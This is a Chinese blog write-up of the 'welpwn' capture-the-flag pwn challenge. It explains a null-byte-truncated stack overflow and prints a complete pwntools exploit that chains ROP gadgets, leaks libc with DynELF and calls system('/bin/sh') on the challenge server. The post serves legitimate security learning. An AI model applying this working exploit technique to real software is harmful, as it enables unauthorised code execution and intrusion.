攻防世界 welpwn WP

最新推荐文章于 2023-05-24 18:00:00 发布
最新推荐文章于 2023-05-24 18:00:00 发布
阅读量898 收藏 2
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zarcs_233/article/details/104106855
版权

这道题出的确实很wel
拿到这题,查看保护

发现shellcode走不通,一般都是走rop路线
IDA打开,分析代码,发现main函数内调用了echo函数

这里的buf有0x400大,但是main不存在栈溢出,继续点开echo

这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。
很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止条件是当读取到a1中\x00的时候。
这就说明,当我们输入payload的时候,就会在覆盖eip地址后截断(地址一般都有\x00)
那么怎么办呢,看了别人wp后发现极其巧妙的操作,因为是复制到s2,所以buf和s2其实是相邻储存的(参数再寄存器里),所以可以想办法跳过buf的开头,继续执行buf下的exp。
于是乎就可以找找能够pop出0x20个字节的代码片。
这个经典EXP可以看下这篇文章
经典EXP
这个rop基本格式:

ppp1_addr=0x40089A
ppp2_addr=0x400880
clean_addr=0x40089C
start_addr=0x400630
payload='a'*24+p64(clean_addr)+p64(ppp1_addr)+p64(0)+p64(1)+p64(write_addr)+p64(8)+p64(addr)+p64(1)
payload+=p64(ppp2_addr)+'a'*56+p64(start_addr)

这个clean_addr就是pop 4个整型的代码片。
所以先进行泄露地址,得到system地址,再写入/bin/sh,再构造system栈帧调用system获得shell

EXP:

from pwn import *
context.log_level='debug'
p=remote("111.198.29.45",48641)
elf=ELF("./81f42c219e81421ebfd1bedd19cf7eff")
start_addr=0x400630
write_addr=elf.got['write']
read_addr=elf.got['read']
ppp1_addr=0x40089A
ppp2_addr=0x400880
clean_addr=0x40089C
def leak(addr):
	p.recv()
	payload='a'*24+p64(clean_addr)+p64(ppp1_addr)+p64(0)+p64(1)+p64(write_addr)+p64(8)+p64(addr)+p64(1)
	payload+=p64(ppp2_addr)+'a'*56+p64(start_addr)
	p.send(payload.ljust(1024,'a'))
	buff=p.recv(8)
	print(buff.encode('hex'))
	return buff 
dyn=DynELF(leak,elf=ELF("./81f42c219e81421ebfd1bedd19cf7eff"))
sys_addr=dyn.lookup("system","libc")
print("System addr:%X" % sys_addr)
def getshell():
	pop_rdi=0x4008A3
	payload='a'*24+p64(clean_addr)+p64(ppp1_addr)+p64(0)+p64(1)+p64(read_addr)+p64(8)+p64(elf.bss())+p64(0)
	payload+=p64(ppp2_addr)+'a'*56+p64(pop_rdi)+p64(elf.bss())+p64(sys_addr)+p64(0)
	p.recv()
	p.send(payload.ljust(1024,'a'))
	p.sendline("/bin/sh")
getshell()
p.interactive()
Zarcs_233
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍 修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。 产品特点 自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位和64位 调试增强(支持PIE )。 符号 断点 杂项 libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。 安装 您有两种使用welpwn 。 通过安装 从0.9.3版本开始已添加setup.py 。
[攻防世界]-welpwn
m0_55906008的博客
12-05 538
pwn
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 812
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
[攻防世界 pwn]——welpwn
Y_peak的博客
02-20 293
[攻防世界 pwn]——welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了。我想出来一个名词叫做栈连接 还是先checksec一下
攻防世界welpwn
weixin_56777139的博客
03-08 185
攻防世界welpwn
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
welpwn pwn 入门题
02-11
pwn 入门题
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 627
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
攻防世界-web-warmup
wuh2333的博客
05-24 330
攻防世界,warmup
攻防世界】Web warmup
DG_s1mple
01-02 783
这一题主要是利用了include的特性如果include的文件名中含有“/”,那么它会识别其为一个带目录的文件,只有最后一个“/”后的字符串对应的文件会被包含,而前面的字符串都只是在指定目录意思是,如果我们的payload是这样的对于include来说,就只会识别"/"后面的内容,变成了解了这个特性之后,我们就可以开始做题了。
ADworld pwn wp - welpwn
fa1c4的blog
06-26 134
输入没有溢出, 但是复制过程出现了溢出点, 0x400复制到0x10中, 所以可以溢出echo函数, 劫持到ROP泄露puts地址, 找到libc版本, 然后ret2libc. 不过尝试之后发现行不通, 因为复制过程遇到截断符’\0’会停止, 所以直接ROP链会复制不完全, pop_rdi_addr本身就包含了’\0’, 所以可以平衡栈后执行ROP, 这里不一定是在复制完返回地址之后马上截断, 但是8字节地址中包含’\0’, 所以一定会截断, 这里覆盖到的地址是buf的前8个字节, 对ROP没影响,...
[XCTF-pwn] 10-welpwn-rctf-2015
weixin_52640415的博客
02-26 218
很久前的题,主程序里没有溢出,echo里遇0截断这里虽有溢出但也写不了rop,64们0太多了。 思路是,A*0x10+0这样会将rbp的尾部1字节置0,然后在payload尾部写rop,中间补ret int __cdecl main(int argc, const char **argv, const char **envp) { char buf[1024]; // [rsp+0h] [rbp-400h] BYREF write(1, "Welcome to RCTF\n", 0x10uL
welpwn(xctf)
weixin_43868725的博客
06-15 232
0x0 程序保护和流程 保护: 流程: main() echo() echo函数中存在明显的栈溢出漏洞。 0x1 利用过程 使用x64的通用gadget,泄露write函数的地址。使用LibcSearcher查出相应的libc,得到system函数和/bin/sh字符串的地址就可以getshell了。但是理想是丰满的现实是骨感的,exp写完后一直报错。用GDB查看一下core。发现确实覆盖了返回地址但是后面紧接着是输入缓冲区中的数据。回过去看echo函数,发现在写入s2的时候/x00会被截断,这种截断
DOSBOX中debug常用指令的使用
热门推荐
weixin_47586883的博客
10-22 1万+
仅作为个人学习笔记 挂在文件这些操作就不说了吧,一张图就够了 进入虚拟c盘,输入debug。 接下来先了解一下常用的一些debug中的命令。(命令不区分大小写) 一、查看、修改CPU中寄存器的内容:R命令。 1.直接输入r,查看寄存器中的内容: 2.改变寄存器中的内容: 可以观察到ax中的内容由0000改变成了ab23。 二、查看内存中的内容:D命令。 1.直接输入d,可以查看预设地址内存处的128个字节的内容: 输入r查看的内容中最下面一行就是当前所在的地址,即073f:0100,再输入d查看的就
攻防世界)(pwn)welpwn
PLpa的博客
07-18 2680
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
攻防世界 easyphp
最新发布
09-11
在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值